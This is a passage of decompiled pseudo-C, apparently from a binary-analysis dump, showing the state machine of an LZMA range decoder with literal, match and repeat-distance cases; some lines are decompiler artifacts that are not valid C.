                                                                                            												__ecx =  *(__ebp - 8);
                                                                                            												__ebx = 0;
                                                                                            												__ebx = 1;
                                                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                            												goto L41;
                                                                                            											}
                                                                                            										case 7:
                                                                                            											L66:
                                                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                                                            											if( *(__ebp - 0x40) != 1) {
                                                                                            												L68:
                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                            												 *(__ebp - 0x80) = 0x16;
                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            												__eax = 0;
                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            												__al = __al & 0x000000fd;
                                                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                                                            												__eflags = __eax;
                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                            												goto L69;
                                                                                            											}
                                                                                            											L67:
                                                                                            											__eax =  *(__ebp - 4);
                                                                                            											__ecx =  *(__ebp - 0x38);
                                                                                            											 *(__ebp - 0x84) = 8;
                                                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                            											goto L132;
                                                                                            										case 8:
                                                                                            											L70:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                            												 *(__ebp - 0x84) = 0xa;
                                                                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                            											} else {
                                                                                            												__eax =  *(__ebp - 0x38);
                                                                                            												__ecx =  *(__ebp - 4);
                                                                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                            												 *(__ebp - 0x84) = 9;
                                                                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                            											}
                                                                                            											goto L132;
                                                                                            										case 9:
                                                                                            											L73:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												goto L90;
                                                                                            											}
                                                                                            											L74:
                                                                                            											__eflags =  *(__ebp - 0x60);
                                                                                            											if( *(__ebp - 0x60) == 0) {
                                                                                            												goto L171;
                                                                                            											}
                                                                                            											L75:
                                                                                            											__eax = 0;
                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                            											__eflags = _t259;
                                                                                            											0 | _t259 = _t259 + _t259 + 9;
                                                                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                            											goto L76;
                                                                                            										case 0xa:
                                                                                            											L82:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												L84:
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                            												 *(__ebp - 0x84) = 0xb;
                                                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                            												goto L132;
                                                                                            											}
                                                                                            											L83:
                                                                                            											__eax =  *(__ebp - 0x28);
                                                                                            											goto L89;
                                                                                            										case 0xb:
                                                                                            											L85:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												__ecx =  *(__ebp - 0x24);
                                                                                            												__eax =  *(__ebp - 0x20);
                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            											} else {
                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x28);
                                                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            											L89:
                                                                                            											__ecx =  *(__ebp - 0x2c);
                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            											L90:
                                                                                            											__eax =  *(__ebp - 4);
                                                                                            											 *(__ebp - 0x80) = 0x15;
                                                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                            											goto L69;
                                                                                            										case 0xc:
                                                                                            											L99:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												L164:
                                                                                            												 *(__ebp - 0x88) = 0xc;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L100:
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t334 = __ebp - 0x70;
                                                                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t334;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											__eax =  *(__ebp - 0x2c);
                                                                                            											goto L101;
                                                                                            										case 0xd:
                                                                                            											L37:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												L159:
                                                                                            												 *(__ebp - 0x88) = 0xd;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L38:
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t122 = __ebp - 0x70;
                                                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t122;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											L39:
                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                            												goto L48;
                                                                                            											}
                                                                                            											L40:
                                                                                            											__eflags = __ebx - 0x100;
                                                                                            											if(__ebx >= 0x100) {
                                                                                            												goto L54;
                                                                                            											}
                                                                                            											L41:
                                                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                            											 *(__ebp - 0x48) = __eax;
                                                                                            											__eax = __eax + 1;
                                                                                            											__eax = __eax << 8;
                                                                                            											__eax = __eax + __ebx;
                                                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            											__ax =  *__esi;
                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                            											__edx = __ax & 0x0000ffff;
                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            												__cx = __ax;
                                                                                            												 *(__ebp - 0x40) = 1;
                                                                                            												__cx = __ax >> 5;
                                                                                            												__eflags = __eax;
                                                                                            												__ebx = __ebx + __ebx + 1;
                                                                                            												 *__esi = __ax;
                                                                                            											} else {
                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                            												0x800 = 0x800 - __edx;
                                                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                            												__ebx = __ebx + __ebx;
                                                                                            												 *__esi = __cx;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            												goto L39;
                                                                                            											} else {
                                                                                            												L45:
                                                                                            												goto L37;
                                                                                            											}
                                                                                            										case 0xe:
                                                                                            											L46:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												L160:
                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L47:
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t156 = __ebp - 0x70;
                                                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t156;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											while(1) {
                                                                                            												L48:
                                                                                            												__eflags = __ebx - 0x100;
                                                                                            												if(__ebx >= 0x100) {
                                                                                            													break;
                                                                                            												}
                                                                                            												L49:
                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                            												__edx = __ebx + __ebx;
                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                            												__esi = __edx + __eax;
                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            												__ax =  *__esi;
                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            													__cx = __ax;
                                                                                            													_t170 = __edx + 1; // 0x1
                                                                                            													__ebx = _t170;
                                                                                            													__cx = __ax >> 5;
                                                                                            													__eflags = __eax;
                                                                                            													 *__esi = __ax;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                            													0x800 = 0x800 - __edi;
                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            													__ebx = __ebx + __ebx;
                                                                                            													 *__esi = __cx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													continue;
                                                                                            												} else {
                                                                                            													L53:
                                                                                            													goto L46;
                                                                                            												}
                                                                                            											}
                                                                                            											L54:
                                                                                            											_t173 = __ebp - 0x34;
                                                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                            											__eflags =  *_t173;
                                                                                            											goto L55;
                                                                                            										case 0xf:
                                                                                            											L58:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												L161:
                                                                                            												 *(__ebp - 0x88) = 0xf;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L59:
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t203 = __ebp - 0x70;
                                                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t203;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											L60:
                                                                                            											__eflags = __ebx - 0x100;
                                                                                            											if(__ebx >= 0x100) {
                                                                                            												L55:
                                                                                            												__al =  *(__ebp - 0x44);
                                                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                            												goto L56;
                                                                                            											}
                                                                                            											L61:
                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                            											__edx = __ebx + __ebx;
                                                                                            											__ecx =  *(__ebp - 0x10);
                                                                                            											__esi = __edx + __eax;
                                                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            											__ax =  *__esi;
                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            												__cx = __ax;
                                                                                            												_t217 = __edx + 1; // 0x1
                                                                                            												__ebx = _t217;
                                                                                            												__cx = __ax >> 5;
                                                                                            												__eflags = __eax;
                                                                                            												 *__esi = __ax;
                                                                                            											} else {
                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                            												0x800 = 0x800 - __edi;
                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            												__ebx = __ebx + __ebx;
                                                                                            												 *__esi = __cx;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            												goto L60;
                                                                                            											} else {
                                                                                            												L65:
                                                                                            												goto L58;
                                                                                            											}
                                                                                            										case 0x10:
                                                                                            											L109:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												L165:
                                                                                            												 *(__ebp - 0x88) = 0x10;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L110:
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t365 = __ebp - 0x70;
                                                                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t365;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											goto L111;
                                                                                            										case 0x11:
                                                                                            											L69:
                                                                                            											__esi =  *(__ebp - 0x58);
                                                                                            											 *(__ebp - 0x84) = 0x12;
                                                                                            											goto L132;
                                                                                            										case 0x12:
                                                                                            											L128:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												L131:
                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                            												 *(__ebp - 0x84) = 0x13;
                                                                                            												__esi =  *(__ebp - 0x58) + 2;
                                                                                            												L132:
                                                                                            												 *(_t644 - 0x54) = _t642;
                                                                                            												goto L133;
                                                                                            											}
                                                                                            											L129:
                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                            											__eflags = __eax;
                                                                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                            											goto L130;
                                                                                            										case 0x13:
                                                                                            											L141:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												L143:
                                                                                            												_t469 = __ebp - 0x58;
                                                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                            												__eflags =  *_t469;
                                                                                            												 *(__ebp - 0x30) = 0x10;
                                                                                            												 *(__ebp - 0x40) = 8;
                                                                                            												L144:
                                                                                            												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                            												L145:
                                                                                            												 *(_t644 - 0x50) = 1;
                                                                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                            												goto L149;
                                                                                            											}
                                                                                            											L142:
                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                            											 *(__ebp - 0x30) = 8;
                                                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                            											L130:
                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                            											 *(__ebp - 0x40) = 3;
                                                                                            											goto L144;
                                                                                            										case 0x14:
                                                                                            											L156:
                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                            											__eax =  *(__ebp - 0x80);
                                                                                            											while(1) {
                                                                                            												L140:
                                                                                            												 *(_t644 - 0x88) = _t537;
                                                                                            												goto L1;
                                                                                            											}
                                                                                            										case 0x15:
                                                                                            											L91:
                                                                                            											__eax = 0;
                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            											__al = __al & 0x000000fd;
                                                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                            											goto L120;
                                                                                            										case 0x16:
                                                                                            											goto L0;
                                                                                            										case 0x17:
                                                                                            											while(1) {
                                                                                            												L145:
                                                                                            												 *(_t644 - 0x50) = 1;
                                                                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                            												goto L149;
                                                                                            											}
                                                                                            										case 0x18:
                                                                                            											goto L146;
                                                                                            										case 0x19:
                                                                                            											L94:
                                                                                            											__eflags = __ebx - 4;
                                                                                            											if(__ebx < 4) {
                                                                                            												L98:
                                                                                            												 *(__ebp - 0x2c) = __ebx;
                                                                                            												L119:
                                                                                            												_t393 = __ebp - 0x2c;
                                                                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                            												__eflags =  *_t393;
                                                                                            												L120:
                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                            												__eflags = __eax;
                                                                                            												if(__eax == 0) {
                                                                                            													L166:
                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												L121:
                                                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                                                            													goto L171;
                                                                                            												}
                                                                                            												L122:
                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                            												_t400 = __ebp - 0x60;
                                                                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                            												__eflags =  *_t400;
                                                                                            												goto L123;
                                                                                            											}
                                                                                            											L95:
                                                                                            											__ecx = __ebx;
                                                                                            											__eax = __ebx;
                                                                                            											__ecx = __ebx >> 1;
                                                                                            											__eax = __ebx & 0x00000001;
                                                                                            											__ecx = (__ebx >> 1) - 1;
                                                                                            											__al = __al | 0x00000002;
                                                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                                                            											__eflags = __ebx - 0xe;
                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                            											if(__ebx >= 0xe) {
                                                                                            												L97:
                                                                                            												__ebx = 0;
                                                                                            												 *(__ebp - 0x48) = __ecx;
                                                                                            												L102:
                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                            													L107:
                                                                                            													__eax = __eax + __ebx;
                                                                                            													 *(__ebp - 0x40) = 4;
                                                                                            													 *(__ebp - 0x2c) = __eax;
                                                                                            													__eax =  *(__ebp - 4);
                                                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                                                            													__eflags = __eax;
                                                                                            													L108:
                                                                                            													__ebx = 0;
                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                            													 *(__ebp - 0x50) = 1;
                                                                                            													 *(__ebp - 0x44) = 0;
                                                                                            													 *(__ebp - 0x48) = 0;
                                                                                            													L112:
                                                                                            													__eax =  *(__ebp - 0x40);
                                                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                            														L118:
                                                                                            														_t391 = __ebp - 0x2c;
                                                                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                            														__eflags =  *_t391;
                                                                                            														goto L119;
                                                                                            													}
                                                                                            													L113:
                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                            													__esi = __edi + __eax;
                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                            													__ax =  *__esi;
                                                                                            													__ecx = __ax & 0x0000ffff;
                                                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                                                            														__ecx = 0;
                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                            														__ecx = 1;
                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                            														__ebx = 1;
                                                                                            														__ecx =  *(__ebp - 0x48);
                                                                                            														__ebx = 1 << __cl;
                                                                                            														__ecx = 1 << __cl;
                                                                                            														__ebx =  *(__ebp - 0x44);
                                                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                            														__cx = __ax;
                                                                                            														__cx = __ax >> 5;
                                                                                            														__eax = __eax - __ecx;
                                                                                            														__edi = __edi + 1;
                                                                                            														__eflags = __edi;
                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                            														 *__esi = __ax;
                                                                                            														 *(__ebp - 0x50) = __edi;
                                                                                            													} else {
                                                                                            														 *(__ebp - 0x10) = __edx;
                                                                                            														0x800 = 0x800 - __ecx;
                                                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            														 *__esi = __dx;
                                                                                            													}
                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            														L111:
                                                                                            														_t368 = __ebp - 0x48;
                                                                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                            														__eflags =  *_t368;
                                                                                            														goto L112;
                                                                                            													} else {
                                                                                            														L117:
                                                                                            														goto L109;
                                                                                            													}
                                                                                            												}
                                                                                            												L103:
                                                                                            												__ecx =  *(__ebp - 0xc);
                                                                                            												__ebx = __ebx + __ebx;
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            													__ebx = __ebx | 0x00000001;
                                                                                            													__eflags = __ebx;
                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													L101:
                                                                                            													_t338 = __ebp - 0x48;
                                                                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                            													__eflags =  *_t338;
                                                                                            													goto L102;
                                                                                            												} else {
                                                                                            													L106:
                                                                                            													goto L99;
                                                                                            												}
                                                                                            											}
                                                                                            											L96:
                                                                                            											__edx =  *(__ebp - 4);
                                                                                            											__eax = __eax - __ebx;
                                                                                            											 *(__ebp - 0x40) = __ecx;
                                                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                            											goto L108;
                                                                                            										case 0x1a:
                                                                                            											L56:
                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                            												L162:
                                                                                            												 *(__ebp - 0x88) = 0x1a;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L57:
                                                                                            											__ecx =  *(__ebp - 0x68);
                                                                                            											__al =  *(__ebp - 0x5c);
                                                                                            											__edx =  *(__ebp - 8);
                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            											 *( *(__ebp - 0x68)) = __al;
                                                                                            											__ecx =  *(__ebp - 0x14);
                                                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                            											__eax = __ecx + 1;
                                                                                            											__edx = 0;
                                                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                            											__edx = _t192;
                                                                                            											goto L80;
                                                                                            										case 0x1b:
                                                                                            											L76:
                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                            												L163:
                                                                                            												 *(__ebp - 0x88) = 0x1b;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L77:
                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                                                            												__eflags = __eax;
                                                                                            											}
                                                                                            											__edx =  *(__ebp - 8);
                                                                                            											__cl =  *(__eax + __edx);
                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                            											 *(__ebp - 0x5c) = __cl;
                                                                                            											 *(__eax + __edx) = __cl;
                                                                                            											__eax = __eax + 1;
                                                                                            											__edx = 0;
                                                                                            											_t275 = __eax %  *(__ebp - 0x74);
                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                            											__edx = _t275;
                                                                                            											__eax =  *(__ebp - 0x68);
                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            											_t284 = __ebp - 0x64;
                                                                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                            											__eflags =  *_t284;
                                                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                                                            											L80:
                                                                                            											 *(__ebp - 0x14) = __edx;
                                                                                            											goto L81;
                                                                                            										case 0x1c:
                                                                                            											while(1) {
                                                                                            												L123:
                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                            													break;
                                                                                            												}
                                                                                            												L124:
                                                                                            												__eax =  *(__ebp - 0x14);
